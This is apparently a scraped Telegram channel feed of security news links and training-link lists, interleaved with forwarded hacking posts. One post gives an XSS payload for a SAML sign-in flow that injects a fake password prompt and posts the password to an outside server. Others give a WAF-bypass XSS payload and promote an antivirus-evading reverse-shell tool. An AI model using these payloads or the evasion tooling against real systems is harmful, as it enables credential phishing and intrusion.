Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐จ Critical Cleo File Transfer #Software Flaw Exploited in #Ransomware Attacks
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
https://undercodenews.com/critical-cleo-file-transfer-software-flaw-exploited-in-ransomware-attacks/
@Undercode_News
UNDERCODE NEWS
Critical Cleo File Transfer Software Flaw Exploited in Ransomware Attacks - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Big Screen, Big Value: #Samsung #Galaxy Tab S9 FE+ Review - Perfect for Family Fun
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
https://undercodenews.com/big-screen-big-value-samsung-galaxy-tab-s9-fe-review-perfect-for-family-fun/
@Undercode_News
UNDERCODE NEWS
Big Screen, Big Value: Samsung Galaxy Tab S9 FE+ Review - Perfect for Family Fun - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ Stealing the Secret Sauce: How Hackers Can Extract #AI Models
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
https://undercodenews.com/stealing-the-secret-sauce-how-hackers-can-extract-ai-models/
@Undercode_News
UNDERCODE NEWS
Stealing the Secret Sauce: How Hackers Can Extract AI Models - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE TESTING
Media is too big
VIEW IN TELEGRAM
๐ฆ The Official NASA CSRF Vulnerability Video
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ Password Spray Attacks Targeting Citrix Netscaler on the Rise
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
https://undercodenews.com/password-spray-attacks-targeting-citrix-netscaler-on-the-rise/
@Undercode_News
UNDERCODE NEWS
Password Spray Attacks Targeting Citrix Netscaler on the Rise - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ Leveling Up Our XSS Proof of Concepts at CybaVerse :
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow โ not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐น Manipulate the HTML to display a fake login prompt.
๐น Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโs defences, this vulnerability still allowed us to:
๐น Phish user credentials via a convincing fake prompt.
๐น Demonstrate impact beyond simple alert pop-ups or redirects.
Hereโs a snippet of the payload I crafted:
โ ๏ธ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> โ ๏ธ
The image below shows the entered password if someone fell for the prompt: โAuthentication failed, re-enter your password.โ
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).
We recently encountered an XSS vulnerability within a SAML Sign-in flow โ not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐น Manipulate the HTML to display a fake login prompt.
๐น Capture user-entered passwords and send them to our server.
Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโs defences, this vulnerability still allowed us to:
๐น Phish user credentials via a convincing fake prompt.
๐น Demonstrate impact beyond simple alert pop-ups or redirects.
Hereโs a snippet of the payload I crafted:
โ ๏ธ <samlp:StatusCode Value="XSS POC';document.body.innerHTML='<br><h1>Authentication failed, re-enter your password</h1><br><form action="//https://lnkd.in/ecG5926A" method="post"><input type="password" name="password"><br><button type="submit">Submit</button></form>'+document.body.innerHTML;&"/> โ ๏ธ
The image below shows the entered password if someone fell for the prompt: โAuthentication failed, re-enter your password.โ
Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.
Ref: Michael Jepson
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐จ Cleo Zero-Day Exploits: A Growing #Ransomware Threat
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
https://undercodenews.com/cleo-zero-day-exploits-a-growing-ransomware-threat/
@Undercode_News
UNDERCODE NEWS
Cleo Zero-Day Exploits: A Growing Ransomware Threat - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Versa Strengthens SASE with Integrated Endpoint DLP
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
https://undercodenews.com/versa-strengthens-sase-with-integrated-endpoint-dlp/
@Undercode_News
UNDERCODE NEWS
Versa Strengthens SASE with Integrated Endpoint DLP - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ Enhanced Cyber Resilience with Zerto Cloud Vault
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
https://undercodenews.com/enhanced-cyber-resilience-with-zerto-cloud-vault/
@Undercode_News
UNDERCODE NEWS
Enhanced Cyber Resilience with Zerto Cloud Vault - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ฎ Streamlining Issue Management with Enhanced #GitHub Issues
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
https://undercodenews.com/streamlining-issue-management-with-enhanced-github-issues/
@Undercode_News
UNDERCODE NEWS
Streamlining Issue Management with Enhanced GitHub Issues - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆFREE ๐๐๐ ๐ญ๐ซ๐๐ข๐ง๐ข๐ง๐ ๐ฌ:
โ Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
โ TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna
โ TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆBypass Virustotal detection
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
๐ก Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
Iโve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.
This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.
๐ก Key Highlights:
- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.
- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.
>> Tested on : Win11 Pro
Iโve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ก๏ธ Steady Connections and Secure Transactions: NCC Assures No Telecom or Banking Disruptions During Elections
https://undercodenews.com/steady-connections-and-secure-transactions-ncc-assures-no-telecom-or-banking-disruptions-during-elections/
@Undercode_News
https://undercodenews.com/steady-connections-and-secure-transactions-ncc-assures-no-telecom-or-banking-disruptions-during-elections/
@Undercode_News
UNDERCODE NEWS
Steady Connections and Secure Transactions: NCC Assures No Telecom or Banking Disruptions During Elections - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โก๏ธ #WhatsApp Simplifies Updates with Unified Channel and Status Creation
https://undercodenews.com/whatsapp-simplifies-updates-with-unified-channel-and-status-creation/
@Undercode_News
https://undercodenews.com/whatsapp-simplifies-updates-with-unified-channel-and-status-creation/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โก๏ธ CharacterAI Gets Safer: New #AI Model for Kids and Parental Controls
https://undercodenews.com/characterai-gets-safer-new-ai-model-for-kids-and-parental-controls/
@Undercode_News
https://undercodenews.com/characterai-gets-safer-new-ai-model-for-kids-and-parental-controls/
@Undercode_News
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆCloudflare_WAF_Bypass by xss0r: NEW Meth !!!
>> Payload: <details open ontoggleโ=alert('xss0r')>
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
>> Payload: <details open ontoggleโ=alert('xss0r')>
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆ14 FREE AWS Knowledge Learning Badges! ๐ฑ
What better way to strut ๐บ๐ป your AWS skills than by earning and flaunting ๐ these badges?
Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! ๐
๐ Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
๐ Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
๐ Learn Serverless with this:
https://lnkd.in/g_q_mChp
๐ Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
๐ File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
๐ Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
๐ AWS Networking Core:
https://lnkd.in/g3u_JTfK
๐ Migration lessons here:
https://lnkd.in/gKaqyA3f
๐ AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
๐ AWS Data Migration Training:
https://lnkd.in/gBjaht2n
๐ Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
๐ AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
๐ Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
๐ Amazon Braket at:
https://lnkd.in/gGKHpQGf
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
What better way to strut ๐บ๐ป your AWS skills than by earning and flaunting ๐ these badges?
Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! ๐
๐ Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
๐ Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
๐ Learn Serverless with this:
https://lnkd.in/g_q_mChp
๐ Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
๐ File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
๐ Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
๐ AWS Networking Core:
https://lnkd.in/g3u_JTfK
๐ Migration lessons here:
https://lnkd.in/gKaqyA3f
๐ AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
๐ AWS Data Migration Training:
https://lnkd.in/gBjaht2n
๐ Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
๐ AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
๐ Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
๐ Amazon Braket at:
https://lnkd.in/gGKHpQGf
Ref: Greg Powell
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn